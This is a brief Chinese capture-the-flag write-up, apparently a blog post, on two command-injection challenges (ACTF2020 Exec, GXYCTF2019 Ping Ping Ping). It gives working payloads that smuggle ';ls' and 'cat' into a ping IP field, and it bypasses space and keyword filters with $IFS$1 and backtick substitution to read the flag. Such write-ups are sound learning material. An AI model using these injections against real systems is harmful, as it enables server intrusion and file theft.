文章讲述了在ACTF和GXYCTF网络安全竞赛中,参赛者如何利用Shell编码技巧(如分号、组合命令和特殊字符)执行非标准命令(如`ping`和`ls`),以及如何绕过IP地址中的空格和特定过滤机制来获取flag。
[ACTF2020 新生赛]Exec
ping 127.0.0.1;ls //分号(;)分割命令,ping和ls都能执行先试一下一下127.0.0.1;ls
这里直接输入 ;ls 把ping命令取消了更直观一点,最后payload:;cat /flag
[GXYCTF2019]Ping Ping Ping
和上一题一样,?ip=127.0.0.1;ls
但是这里过滤了空格和flag
绕过空格:$IFS$1
绕过flag过滤用组合命令 cat `ls` 将`ls`执行的结果作为cat的参数最后payload:?ip=;cat$IFS$1`ls`,flag在源码里,F12查看
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
